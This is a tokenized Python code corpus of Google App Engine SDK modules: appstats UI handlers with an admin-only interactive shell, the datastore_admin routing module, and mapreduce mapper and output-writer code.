write ( render ( '<STR_LIT>' , data ) ) <EOL> def _get_summary_data ( self , summaries ) : <EOL> """<STR_LIT>""" <EOL> allstats = { } <EOL> pathstats = { } <EOL> pivot_path_rpc = { } <EOL> pivot_rpc_path = { } <EOL> total_cost_micropennies = <NUM_LIT:0> <EOL> summaries = sorted ( summaries , <EOL> key = lambda x : ( - x . start_timestamp_milliseconds ( ) ) ) <EOL> for index , summary in enumerate ( summaries ) : <EOL> path_key = recording . config . extract_key ( summary ) <EOL> if path_key not in pathstats : <EOL> pathstats [ path_key ] = PathStatsInfo ( <NUM_LIT:0> , { } , <NUM_LIT:1> , [ index + <NUM_LIT:1> ] ) <EOL> else : <EOL> pathstats_info = pathstats [ path_key ] <EOL> pathstats_info . num_requests += <NUM_LIT:1> <EOL> if len ( pathstats_info . most_recent_requests ) > <NUM_LIT:10> : <EOL> if pathstats_info . most_recent_requests [ - <NUM_LIT:1> ] : <EOL> pathstats_info . most_recent_requests . append ( <NUM_LIT:0> ) <EOL> else : <EOL> pathstats_info . most_recent_requests . append ( index + <NUM_LIT:1> ) <EOL> if path_key not in pivot_path_rpc : <EOL> pivot_path_rpc [ path_key ] = { } <EOL> for x in summary . rpc_stats_list ( ) : <EOL> rpc_key = x . service_call_name ( ) <EOL> total_calls = x . total_amount_of_calls ( ) <EOL> cost_micropennies = x . total_cost_of_calls_microdollars ( ) <EOL> total_cost_micropennies += cost_micropennies <EOL> pathstats [ path_key ] . cost += cost_micropennies <EOL> _add_billed_ops_to_map ( pathstats [ path_key ] . billed_ops , <EOL> x . total_billed_ops_list ( ) ) <EOL> if rpc_key in allstats : <EOL> allstats [ rpc_key ] . calls += total_calls <EOL> allstats [ rpc_key ] . cost += cost_micropennies <EOL> else : <EOL> allstats [ rpc_key ] = AllStatsInfo ( total_calls , cost_micropennies , { } ) <EOL> _add_billed_ops_to_map ( <EOL> allstats [ rpc_key ] . billed_ops , x . 
total_billed_ops_list ( ) ) <EOL> if rpc_key not in pivot_path_rpc [ path_key ] : <EOL> pivot_path_rpc [ path_key ] [ rpc_key ] = PivotInfo ( rpc_key , <NUM_LIT:0> , <NUM_LIT:0> , { } , <NUM_LIT:0> ) <EOL> pivot_path_rpc [ path_key ] [ rpc_key ] . calls += total_calls <EOL> pivot_path_rpc [ path_key ] [ rpc_key ] . cost += cost_micropennies <EOL> _add_billed_ops_to_map ( pivot_path_rpc [ path_key ] [ rpc_key ] . billed_ops , <EOL> x . total_billed_ops_list ( ) ) <EOL> if rpc_key not in pivot_rpc_path : <EOL> pivot_rpc_path [ rpc_key ] = { } <EOL> if path_key not in pivot_rpc_path [ rpc_key ] : <EOL> pivot_rpc_path [ rpc_key ] [ path_key ] = PivotInfo ( path_key , <NUM_LIT:0> , <NUM_LIT:0> , { } , <NUM_LIT:0> ) <EOL> pivot_rpc_path [ rpc_key ] [ path_key ] . calls += total_calls <EOL> pivot_rpc_path [ rpc_key ] [ path_key ] . cost += cost_micropennies <EOL> _add_billed_ops_to_map ( pivot_rpc_path [ rpc_key ] [ path_key ] . billed_ops , <EOL> x . total_billed_ops_list ( ) ) <EOL> allstats_by_count = [ ] <EOL> for k , v in allstats . iteritems ( ) : <EOL> for path_vals in pivot_rpc_path [ k ] . itervalues ( ) : <EOL> path_vals . billed_ops = _billed_ops_to_str ( <EOL> path_vals . billed_ops . itervalues ( ) ) <EOL> path_vals . cost_pct = _as_percentage_of ( <EOL> path_vals . cost , total_cost_micropennies ) <EOL> pivot = sorted ( pivot_rpc_path [ k ] . itervalues ( ) , <EOL> key = lambda x : ( - x . calls , x . name ) ) <EOL> allstats_by_count . append ( ( <EOL> k , v . calls , v . cost , _billed_ops_to_str ( v . billed_ops . itervalues ( ) ) , <EOL> _as_percentage_of ( v . cost , total_cost_micropennies ) , <EOL> [ x . to_list ( ) for x in pivot ] ) ) <EOL> allstats_by_count . sort ( key = lambda x : ( - x [ <NUM_LIT:1> ] , x [ <NUM_LIT:0> ] ) ) <EOL> pathstats_by_count = [ ] <EOL> for path_key , pathstats_info in pathstats . iteritems ( ) : <EOL> rpc_count = <NUM_LIT:0> <EOL> for rpc_vals in pivot_path_rpc [ path_key ] . itervalues ( ) : <EOL> rpc_vals . 
billed_ops = _billed_ops_to_str ( <EOL> rpc_vals . billed_ops . itervalues ( ) ) <EOL> rpc_vals . cost_pct = _as_percentage_of ( <EOL> rpc_vals . cost , total_cost_micropennies ) <EOL> rpc_count += rpc_vals . calls <EOL> pivot = sorted ( pivot_path_rpc [ path_key ] . itervalues ( ) , <EOL> key = lambda x : ( - x . calls , x . name ) ) <EOL> pathstats_by_count . append ( ( <EOL> path_key , rpc_count , pathstats_info . cost , <EOL> _billed_ops_to_str ( pathstats_info . billed_ops . itervalues ( ) ) , <EOL> _as_percentage_of ( pathstats_info . cost , total_cost_micropennies ) , <EOL> pathstats_info . num_requests , <EOL> pathstats_info . most_recent_requests , <EOL> [ x . to_list ( ) for x in pivot ] ) ) <EOL> pathstats_by_count . sort ( key = lambda x : ( - x [ <NUM_LIT:1> ] , - x [ <NUM_LIT:5> ] , x [ <NUM_LIT:0> ] ) ) <EOL> return { '<STR_LIT>' : summaries , <EOL> '<STR_LIT>' : allstats_by_count , <EOL> '<STR_LIT>' : pathstats_by_count , <EOL> } <EOL> class DetailsHandler ( webapp . RequestHandler ) : <EOL> """<STR_LIT>""" <EOL> def get ( self ) : <EOL> recording . dont_record ( ) <EOL> time_key = self . request . get ( '<STR_LIT:time>' ) <EOL> timestamp = None <EOL> record = None <EOL> if time_key : <EOL> try : <EOL> timestamp = int ( time_key ) * <NUM_LIT> <EOL> except Exception : <EOL> pass <EOL> if timestamp : <EOL> record = recording . load_full_proto ( timestamp ) <EOL> render_record ( self . response , record , '<STR_LIT>' ) <EOL> def render_record ( response , record , file_url = None , extra_data = None ) : <EOL> """<STR_LIT>""" <EOL> data = { } <EOL> if extra_data is not None : <EOL> data . update ( extra_data ) <EOL> if record is None : <EOL> if extra_data is None : <EOL> response . set_status ( <NUM_LIT> ) <EOL> response . out . write ( render ( '<STR_LIT>' , data ) ) <EOL> return <EOL> data . update ( get_details_data ( record , file_url ) ) <EOL> response . out . 
write ( render ( '<STR_LIT>' , data ) ) <EOL> def get_details_data ( record , file_url = None ) : <EOL> """<STR_LIT>""" <EOL> rpcstats_map = { } <EOL> for rpc_stat in record . individual_stats_list ( ) : <EOL> key = rpc_stat . service_call_name ( ) <EOL> count , real , api , rpc_cost_micropennies , billed_ops = rpcstats_map . get ( <EOL> key , ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , { } ) ) <EOL> count += <NUM_LIT:1> <EOL> real += rpc_stat . duration_milliseconds ( ) <EOL> api += rpc_stat . api_mcycles ( ) <EOL> rpc_cost_micropennies += rpc_stat . call_cost_microdollars ( ) <EOL> _add_billed_ops_to_map ( billed_ops , rpc_stat . billed_ops_list ( ) ) <EOL> rpcstats_map [ key ] = ( count , real , api , rpc_cost_micropennies , billed_ops ) <EOL> rpcstats_by_count = [ <EOL> ( name , count , real , recording . mcycles_to_msecs ( api ) , <EOL> rpc_cost_micropennies , _billed_ops_to_str ( billed_ops . itervalues ( ) ) ) <EOL> for name , ( count , real , api , rpc_cost_micropennies , billed_ops ) <EOL> in rpcstats_map . iteritems ( ) ] <EOL> rpcstats_by_count . sort ( key = lambda x : - x [ <NUM_LIT:1> ] ) <EOL> real_total = <NUM_LIT:0> <EOL> api_total_mcycles = <NUM_LIT:0> <EOL> for i , rpc_stat in enumerate ( record . individual_stats_list ( ) ) : <EOL> real_total += rpc_stat . duration_milliseconds ( ) <EOL> api_total_mcycles += rpc_stat . api_mcycles ( ) <EOL> api_total = recording . mcycles_to_msecs ( api_total_mcycles ) <EOL> return { '<STR_LIT>' : sys , <EOL> '<STR_LIT>' : record , <EOL> '<STR_LIT>' : rpcstats_by_count , <EOL> '<STR_LIT>' : real_total , <EOL> '<STR_LIT>' : api_total , <EOL> '<STR_LIT>' : file_url , <EOL> } <EOL> class ShellHandler ( webapp . RequestHandler ) : <EOL> """<STR_LIT>""" <EOL> def _check_access ( self ) : <EOL> if recording . config . SHELL_OK : <EOL> return True <EOL> self . response . set_status ( <NUM_LIT> ) <EOL> self . response . out . 
write ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return False <EOL> def get ( self ) : <EOL> recording . dont_record ( ) <EOL> if not self . _check_access ( ) : <EOL> return <EOL> script = self . request . get ( '<STR_LIT>' , recording . config . DEFAULT_SCRIPT ) <EOL> extra_data = { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : script , <EOL> '<STR_LIT>' : admin . get_xsrf_token ( ) , <EOL> } <EOL> render_record ( self . response , None , '<STR_LIT>' , extra_data ) <EOL> @ admin . xsrf_required <EOL> def post ( self ) : <EOL> recording . dont_record ( ) <EOL> if not self . _check_access ( ) : <EOL> return <EOL> recorder = recording . Recorder ( os . environ ) <EOL> recording . recorder_proxy . set_for_current_request ( recorder ) <EOL> script = self . request . get ( '<STR_LIT>' , '<STR_LIT>' ) . replace ( '<STR_LIT:\r\n>' , '<STR_LIT:\n>' ) <EOL> output , errors = self . execute_script ( script ) <EOL> recording . recorder_proxy . clear_for_current_request ( ) <EOL> recorder . record_http_status ( <NUM_LIT:0> ) <EOL> recorder . save ( ) <EOL> record = recorder . get_full_proto ( ) <EOL> extra_data = { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : script , <EOL> '<STR_LIT>' : output , <EOL> '<STR_LIT>' : errors , <EOL> '<STR_LIT>' : int ( recorder . start_timestamp * <NUM_LIT:1000> ) , <EOL> '<STR_LIT>' : admin . get_xsrf_token ( ) , <EOL> } <EOL> render_record ( self . response , record , '<STR_LIT>' , extra_data ) <EOL> def execute_script ( self , script ) : <EOL> save_stdout = sys . stdout <EOL> save_stderr = sys . stderr <EOL> new_stdout = cStringIO . StringIO ( ) <EOL> new_stderr = cStringIO . StringIO ( ) <EOL> try : <EOL> sys . stdout = new_stdout <EOL> sys . stderr = new_stderr <EOL> exec ( script , { } ) <EOL> except BaseException : <EOL> traceback . print_exc ( ) <EOL> finally : <EOL> sys . stdout = save_stdout <EOL> sys . stderr = save_stderr <EOL> return new_stdout . getvalue ( ) , new_stderr . getvalue ( ) <EOL> class FileHandler ( webapp . 
RequestHandler ) : <EOL> """<STR_LIT>""" <EOL> def get ( self ) : <EOL> recording . dont_record ( ) <EOL> lineno = self . request . get ( '<STR_LIT:n>' ) <EOL> try : <EOL> lineno = int ( lineno ) <EOL> except : <EOL> lineno = <NUM_LIT:0> <EOL> filename = self . request . get ( '<STR_LIT:f>' ) or '<STR_LIT>' <EOL> orig_filename = filename <EOL> match = re . match ( '<STR_LIT>' , filename ) <EOL> if match : <EOL> index , tail = match . groups ( ) <EOL> index = int ( index ) <EOL> if index < len ( sys . path ) : <EOL> filename = sys . path [ index ] + tail <EOL> try : <EOL> fp = open ( filename ) <EOL> except IOError , err : <EOL> self . response . out . write ( '<STR_LIT>' % <EOL> cgi . escape ( str ( err ) ) ) <EOL> self . response . set_status ( <NUM_LIT> ) <EOL> else : <EOL> try : <EOL> data = { '<STR_LIT>' : fp , <EOL> '<STR_LIT:filename>' : filename , <EOL> '<STR_LIT>' : orig_filename , <EOL> '<STR_LIT>' : lineno , <EOL> } <EOL> self . response . out . write ( render ( '<STR_LIT>' , data ) ) <EOL> finally : <EOL> fp . close ( ) <EOL> class StaticHandler ( webapp . RequestHandler ) : <EOL> """<STR_LIT>""" <EOL> def get ( self ) : <EOL> recording . dont_record ( ) <EOL> here = os . path . dirname ( __file__ ) <EOL> fn = self . request . path <EOL> i = fn . rfind ( '<STR_LIT:/>' ) <EOL> fn = fn [ i + <NUM_LIT:1> : ] <EOL> fn = os . path . join ( here , '<STR_LIT>' , fn ) <EOL> ctype , encoding = mimetypes . guess_type ( fn ) <EOL> assert ctype and '<STR_LIT:/>' in ctype , repr ( ctype ) <EOL> expiry = <NUM_LIT> <EOL> expiration = email . Utils . formatdate ( time . time ( ) + expiry , usegmt = True ) <EOL> fp = open ( fn , '<STR_LIT:rb>' ) <EOL> try : <EOL> self . response . out . write ( fp . read ( ) ) <EOL> finally : <EOL> fp . close ( ) <EOL> self . response . headers [ '<STR_LIT>' ] = ctype <EOL> self . response . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . response . 
headers [ '<STR_LIT>' ] = expiration <EOL> URLMAP = [ <EOL> ( '<STR_LIT>' , DetailsHandler ) , <EOL> ( '<STR_LIT>' , ShellHandler ) , <EOL> ( '<STR_LIT>' , FileHandler ) , <EOL> ( '<STR_LIT>' , StaticHandler ) , <EOL> ( '<STR_LIT>' , SummaryHandler ) , <EOL> ] <EOL> class AuthCheckMiddleware ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , application ) : <EOL> self . _application = application <EOL> def __call__ ( self , environ , start_response ) : <EOL> if not environ . get ( '<STR_LIT>' , '<STR_LIT>' ) . startswith ( '<STR_LIT>' ) : <EOL> if not users . is_current_user_admin ( ) : <EOL> if users . get_current_user ( ) is None : <EOL> start_response ( '<STR_LIT>' , <EOL> [ ( '<STR_LIT>' , <EOL> users . create_login_url ( os . getenv ( '<STR_LIT>' , '<STR_LIT>' ) ) ) ] ) <EOL> return [ ] <EOL> else : <EOL> start_response ( '<STR_LIT>' , [ ] ) <EOL> return [ '<STR_LIT>' ] <EOL> return self . _application ( environ , start_response ) <EOL> app = AuthCheckMiddleware ( webapp . WSGIApplication ( URLMAP , debug = DEBUG ) ) <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> util . run_bare_wsgi_app ( app ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import operator <EOL> import os <EOL> import time <EOL> from google . appengine . api import app_identity <EOL> from google . appengine . api import datastore_errors <EOL> from google . appengine . api import users <EOL> from google . appengine . ext import deferred <EOL> from google . appengine . ext import webapp <EOL> from google . appengine . ext . datastore_admin import backup_handler <EOL> from google . appengine . ext . datastore_admin import config <EOL> from google . appengine . ext . datastore_admin import copy_handler <EOL> from google . appengine . ext . datastore_admin import delete_handler <EOL> from google . appengine . ext . datastore_admin import utils <EOL> from google . appengine . ext . db import metadata <EOL> from google . appengine . ext . db import stats <EOL> from google . appengine . ext . webapp import util <EOL> from google . appengine . runtime import apiproxy_errors <EOL> from google . appengine . runtime import features <EOL> ENTITY_ACTIONS = { <EOL> '<STR_LIT>' : copy_handler . ConfirmCopyHandler . Render , <EOL> '<STR_LIT>' : delete_handler . ConfirmDeleteHandler . Render , <EOL> '<STR_LIT>' : backup_handler . ConfirmBackupHandler . Render , <EOL> } <EOL> if features . IsEnabled ( '<STR_LIT>' ) : <EOL> del ENTITY_ACTIONS [ '<STR_LIT>' ] <EOL> BACKUP_ACTIONS = { <EOL> '<STR_LIT>' : backup_handler . ConfirmDeleteBackupHandler . Render , <EOL> '<STR_LIT>' : backup_handler . ConfirmRestoreFromBackupHandler . Render , <EOL> '<STR_LIT>' : backup_handler . BackupInformationHandler . Render , <EOL> } <EOL> PENDING_BACKUP_ACTIONS = { <EOL> '<STR_LIT>' : backup_handler . ConfirmAbortBackupHandler . Render , <EOL> '<STR_LIT>' : backup_handler . BackupInformationHandler . Render , <EOL> } <EOL> GET_ACTIONS = ENTITY_ACTIONS . copy ( ) <EOL> GET_ACTIONS . update ( BACKUP_ACTIONS ) <EOL> GET_ACTIONS . update ( PENDING_BACKUP_ACTIONS ) <EOL> GET_ACTIONS . update ( { '<STR_LIT>' : <EOL> backup_handler . 
ConfirmBackupImportHandler . Render } ) <EOL> MAX_RPCS = <NUM_LIT:10> <EOL> def _GetDatastoreStats ( kinds_list , use_stats_kinds = False ) : <EOL> """<STR_LIT>""" <EOL> global_stat = stats . GlobalStat . all ( ) . fetch ( <NUM_LIT:1> ) <EOL> if not global_stat : <EOL> return _KindsListToTuple ( kinds_list ) <EOL> global_ts = global_stat [ <NUM_LIT:0> ] . timestamp <EOL> kind_stats = stats . KindStat . all ( ) . filter ( '<STR_LIT>' , global_ts ) . fetch ( <NUM_LIT:1000> ) <EOL> if not kind_stats : <EOL> return _KindsListToTuple ( kinds_list ) <EOL> results = { } <EOL> for kind_ent in kind_stats : <EOL> if ( not kind_ent . kind_name . startswith ( '<STR_LIT>' ) <EOL> and ( use_stats_kinds or kind_ent . kind_name in kinds_list ) <EOL> and kind_ent . count > <NUM_LIT:0> ) : <EOL> results [ kind_ent . kind_name ] = _PresentatableKindStats ( kind_ent ) <EOL> utils . CacheStats ( results . values ( ) ) <EOL> for kind_str in kinds_list or [ ] : <EOL> if kind_str not in results : <EOL> results [ kind_str ] = { '<STR_LIT>' : kind_str } <EOL> return ( global_ts , <EOL> sorted ( results . values ( ) , key = lambda x : x [ '<STR_LIT>' ] ) ) <EOL> def _KindsListToTuple ( kinds_list ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' , [ { '<STR_LIT>' : kind } for kind in sorted ( kinds_list ) ] <EOL> def _PresentatableKindStats ( kind_ent ) : <EOL> """<STR_LIT>""" <EOL> count = kind_ent . count <EOL> entity_bytes = kind_ent . entity_bytes <EOL> total_bytes = kind_ent . bytes <EOL> average_bytes = entity_bytes / count <EOL> return { '<STR_LIT>' : kind_ent . kind_name , <EOL> '<STR_LIT:count>' : utils . FormatThousands ( kind_ent . count ) , <EOL> '<STR_LIT>' : utils . GetPrettyBytes ( entity_bytes ) , <EOL> '<STR_LIT>' : entity_bytes , <EOL> '<STR_LIT>' : utils . GetPrettyBytes ( total_bytes ) , <EOL> '<STR_LIT>' : total_bytes , <EOL> '<STR_LIT>' : utils . GetPrettyBytes ( average_bytes ) , <EOL> } <EOL> class RouteByActionHandler ( webapp . 
RequestHandler ) : <EOL> """<STR_LIT>""" <EOL> def ListActions ( self , error = None ) : <EOL> """<STR_LIT>""" <EOL> use_stats_kinds = False <EOL> kinds = [ ] <EOL> more_kinds = False <EOL> try : <EOL> kinds , more_kinds = self . GetKinds ( ) <EOL> if not kinds : <EOL> use_stats_kinds = True <EOL> logging . warning ( '<STR_LIT>' ) <EOL> except datastore_errors . Error , e : <EOL> logging . exception ( e ) <EOL> use_stats_kinds = True <EOL> last_stats_update , kind_stats = _GetDatastoreStats ( <EOL> kinds , use_stats_kinds = use_stats_kinds ) <EOL> template_params = { <EOL> '<STR_LIT>' : self . request . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : utils . GenerateHomeUrl ( None ) , <EOL> '<STR_LIT>' : ( self . request . get ( '<STR_LIT>' ) and not <EOL> self . request . get ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : kind_stats , <EOL> '<STR_LIT>' : more_kinds , <EOL> '<STR_LIT>' : last_stats_update , <EOL> '<STR_LIT>' : self . request . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : app_identity . get_application_id ( ) , <EOL> '<STR_LIT>' : self . request . get ( '<STR_LIT>' , None ) is not None , <EOL> '<STR_LIT>' : self . request . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : sorted ( ENTITY_ACTIONS . keys ( ) ) , <EOL> '<STR_LIT>' : sorted ( BACKUP_ACTIONS . keys ( ) ) , <EOL> '<STR_LIT>' : sorted ( PENDING_BACKUP_ACTIONS . keys ( ) ) , <EOL> '<STR_LIT:error>' : error , <EOL> '<STR_LIT>' : self . GetOperations ( active = False ) , <EOL> '<STR_LIT>' : self . GetOperations ( active = True ) , <EOL> '<STR_LIT>' : self . GetPendingBackups ( ) , <EOL> '<STR_LIT>' : self . GetBackups ( ) , <EOL> '<STR_LIT>' : config . MAPREDUCE_PATH + '<STR_LIT>' <EOL> } <EOL> utils . RenderToResponse ( self , '<STR_LIT>' , template_params ) <EOL> def RouteAction ( self , action_dict ) : <EOL> action = self . request . get ( '<STR_LIT:action>' ) <EOL> if not action : <EOL> self . ListActions ( error = self . request . 
get ( '<STR_LIT:error>' , None ) ) <EOL> elif action not in action_dict : <EOL> error = '<STR_LIT>' % action <EOL> self . ListActions ( error = error ) <EOL> else : <EOL> action_dict [ action ] ( self ) <EOL> # GET and POST entry points both dispatch through RouteAction. <EOL> def get ( self ) : <EOL> self . RouteAction ( GET_ACTIONS ) <EOL> # NOTE(review): post() also routes through GET_ACTIONS; upstream datastore_admin routes POST through POST_ACTIONS -- confirm this is intended. <EOL> def post ( self ) : <EOL> self . RouteAction ( GET_ACTIONS ) <EOL> # Returns (kinds, more_kinds); more_kinds is True when the metadata scan hit its deadline. <EOL> def GetKinds ( self , all_ns = True , deadline = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> if all_ns : <EOL> kinds , more_kinds = self . GetKindsForAllNamespaces ( deadline ) <EOL> else : <EOL> kinds , more_kinds = self . GetKindsForCurrentNamespace ( deadline ) <EOL> return kinds , more_kinds <EOL> # Collects visible kind names across every namespace, running at most MAX_RPCS per-namespace kind iterators at once. <EOL> def GetKindsForAllNamespaces ( self , deadline ) : <EOL> """<STR_LIT>""" <EOL> start = time . time ( ) <EOL> kind_name_set = set ( ) <EOL> # Advances each iterator one step; exhausted iterators are dropped from the list. <EOL> def ReadFromKindIters ( kind_iter_list ) : <EOL> """<STR_LIT>""" <EOL> completed = [ ] <EOL> for kind_iter in kind_iter_list : <EOL> try : <EOL> kind_name = kind_iter . next ( ) . kind_name <EOL> if utils . IsKindNameVisible ( kind_name ) : <EOL> kind_name_set . add ( kind_name ) <EOL> except StopIteration : <EOL> completed . append ( kind_iter ) <EOL> for kind_iter in completed : <EOL> kind_iter_list . remove ( kind_iter ) <EOL> more_kinds = False <EOL> try : <EOL> namespace_iter = metadata . Namespace . all ( ) . run ( batch_size = <NUM_LIT:1000> , <EOL> deadline = deadline ) <EOL> kind_iter_list = [ ] <EOL> for ns in namespace_iter : <EOL> # Budget the remaining wall-clock time for each per-namespace query. <EOL> remaining = deadline - ( time . time ( ) - start ) <EOL> if remaining <= <NUM_LIT:0> : <EOL> raise datastore_errors . Timeout <EOL> kind_iter_list . append ( metadata . Kind . all ( namespace = ns . namespace_name ) <EOL> . run ( batch_size = <NUM_LIT:1000> , deadline = remaining ) ) <EOL> while len ( kind_iter_list ) == MAX_RPCS : <EOL> ReadFromKindIters ( kind_iter_list ) <EOL> while kind_iter_list : <EOL> ReadFromKindIters ( kind_iter_list ) <EOL> except ( datastore_errors . Timeout , apiproxy_errors . DeadlineExceededError ) : <EOL> more_kinds = True <EOL> logging . warning ( '<STR_LIT>' ) <EOL> return sorted ( kind_name_set ) , more_kinds <EOL> # Same scan restricted to the current namespace; kinds arrive pre-ordered from the query. <EOL> def GetKindsForCurrentNamespace ( self , deadline ) : <EOL> """<STR_LIT>""" <EOL> more_kinds = False <EOL> kind_names = [ ] <EOL> try : <EOL> kinds = metadata . Kind . all ( ) . order ( '<STR_LIT>' ) . run ( batch_size = <NUM_LIT:1000> , <EOL> deadline = deadline ) <EOL> for kind in kinds : <EOL> kind_name = kind . kind_name <EOL> if utils . IsKindNameVisible ( kind_name ) : <EOL> kind_names . append ( kind_name ) <EOL> except ( datastore_errors . Timeout , apiproxy_errors . DeadlineExceededError ) : <EOL> more_kinds = True <EOL> logging . warning ( '<STR_LIT>' ) <EOL> return kind_names , more_kinds <EOL> # Fetches DatastoreAdminOperation entities, active or terminal, newest first, capped at limit. <EOL> def GetOperations ( self , active = False , limit = <NUM_LIT:100> ) : <EOL> """<STR_LIT>""" <EOL> query = utils . DatastoreAdminOperation . all ( ) <EOL> if active : <EOL> query . filter ( '<STR_LIT>' , utils . DatastoreAdminOperation . STATUS_ACTIVE ) <EOL> else : <EOL> query . filter ( '<STR_LIT>' , [ <EOL> utils . DatastoreAdminOperation . STATUS_COMPLETED , <EOL> utils . DatastoreAdminOperation . STATUS_FAILED , <EOL> utils . DatastoreAdminOperation . STATUS_ABORTED ] ) <EOL> operations = query . fetch ( max ( <NUM_LIT> , limit ) if limit else <NUM_LIT:1000> ) <EOL> operations = sorted ( operations , key = operator . attrgetter ( '<STR_LIT>' ) , <EOL> reverse = True ) <EOL> return operations [ : limit ] <EOL> # Lists completed BackupInformation entities; timeouts are logged and the partial result returned. <EOL> def GetBackups ( self , limit = <NUM_LIT:100> , deadline = <NUM_LIT:10> ) : <EOL> """<STR_LIT>""" <EOL> backups = [ ] <EOL> query = backup_handler . BackupInformation . all ( ) <EOL> query . filter ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> query . order ( '<STR_LIT>' ) <EOL> try : <EOL> backups . extend ( query . run ( deadline = deadline , limit = limit ) ) <EOL> except ( datastore_errors . Timeout , apiproxy_errors . DeadlineExceededError ) : <EOL> logging . warning ( '<STR_LIT>' ) <EOL> return backups <EOL> # Lists backups still in flight (filter on None), newest first, capped at limit. <EOL> def GetPendingBackups ( self , limit = <NUM_LIT:100> ) : <EOL> """<STR_LIT>""" <EOL> query = backup_handler . BackupInformation . all ( ) <EOL> query . filter ( '<STR_LIT>' , None ) <EOL> backups = query . fetch ( max ( <NUM_LIT> , limit ) if limit else <NUM_LIT:1000> ) <EOL> backups = sorted ( backups , key = operator . attrgetter ( '<STR_LIT>' ) , <EOL> reverse = True ) <EOL> return backups [ : limit ] <EOL> # Serves a fixed whitelist of bundled static files; anything else gets an error status. <EOL> class StaticResourceHandler ( webapp . RequestHandler ) : <EOL> """<STR_LIT>""" <EOL> _BASE_FILE_PATH = os . path . dirname ( __file__ ) <EOL> # Maps a relative request path to its Content-Type. <EOL> _RESOURCE_MAP = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def get ( self ) : <EOL> relative_path = self . request . path . split ( config . BASE_PATH + '<STR_LIT:/>' ) [ <NUM_LIT:1> ] <EOL> if relative_path not in self . _RESOURCE_MAP : <EOL> self . response . set_status ( <NUM_LIT> ) <EOL> self . response . out . write ( '<STR_LIT>' ) <EOL> return <EOL> path = os . path . join ( self . _BASE_FILE_PATH , relative_path ) <EOL> self . response . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . response . headers [ '<STR_LIT:Content-Type>' ] = self . _RESOURCE_MAP [ relative_path ] <EOL> # One resource gets a literal substitution applied before serving; the rest are sent verbatim. <EOL> if relative_path == '<STR_LIT>' : <EOL> self . response . out . write ( <EOL> open ( path ) . read ( ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> else : <EOL> self . response . out . write ( open ( path ) . read ( ) ) <EOL> # Redirects to the login URL for the requested continue target; missing target is an error. <EOL> class LoginRequiredHandler ( webapp . RequestHandler ) : <EOL> """<STR_LIT>""" <EOL> def get ( self ) : <EOL> target = self . request . get ( '<STR_LIT>' ) <EOL> if not target : <EOL> self . error ( <NUM_LIT> ) <EOL> return <EOL> login_url = users . create_login_url ( target ) <EOL> self . redirect ( login_url ) <EOL> # Builds the WSGI application: backup/copy/delete handlers plus deferred, static and action routes. <EOL> def CreateApplication ( ) : <EOL> """<STR_LIT>""" <EOL> return webapp . WSGIApplication ( <EOL> backup_handler . handlers_list ( config . BASE_PATH ) + <EOL> copy_handler . handlers_list ( config . BASE_PATH ) + <EOL> [ ( r'<STR_LIT>' % ( config . BASE_PATH , <EOL> delete_handler . ConfirmDeleteHandler . SUFFIX ) , <EOL> delete_handler . ConfirmDeleteHandler ) , <EOL> ( r'<STR_LIT>' % ( config . BASE_PATH , delete_handler . DoDeleteHandler . SUFFIX ) , <EOL> delete_handler . DoDeleteHandler ) , <EOL> ( r'<STR_LIT>' % ( config . BASE_PATH , utils . MapreduceDoneHandler . SUFFIX ) , <EOL> utils . MapreduceDoneHandler ) , <EOL> ( config . DEFERRED_PATH , deferred . TaskHandler ) , <EOL> ( r'<STR_LIT>' % config . BASE_PATH , StaticResourceHandler ) , <EOL> ( r'<STR_LIT>' , LoginRequiredHandler ) , <EOL> ( r'<STR_LIT>' , RouteByActionHandler ) ] ) <EOL> # Module-level singleton application and CGI entry point. <EOL> APP = CreateApplication ( ) <EOL> def main ( ) : <EOL> util . run_wsgi_app ( APP ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> from google . appengine . ext . mapreduce import shard_life_cycle <EOL> class Mapper ( shard_life_cycle . _ShardLifeCycle ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def __call__ ( self , slice_ctx , val ) : <EOL> """<STR_LIT>""" <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> # Output writers for the mapreduce library: the abstract OutputWriter interface plus Google Cloud Storage backed implementations. <EOL> from __future__ import with_statement <EOL> __all__ = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> import cStringIO <EOL> import gc <EOL> import logging <EOL> import pickle <EOL> import random <EOL> import string <EOL> import time <EOL> from google . appengine . ext . mapreduce import context <EOL> from google . appengine . ext . mapreduce import errors <EOL> from google . appengine . ext . mapreduce import json_util <EOL> from google . appengine . ext . mapreduce import kv_pb <EOL> from google . appengine . ext . mapreduce import model <EOL> from google . appengine . ext . mapreduce import operation <EOL> from google . appengine . ext . mapreduce import records <EOL> from google . appengine . ext . mapreduce import shard_life_cycle <EOL> # Prefer the SDK-bundled cloudstorage client; fall back to the standalone package if the bundled one is 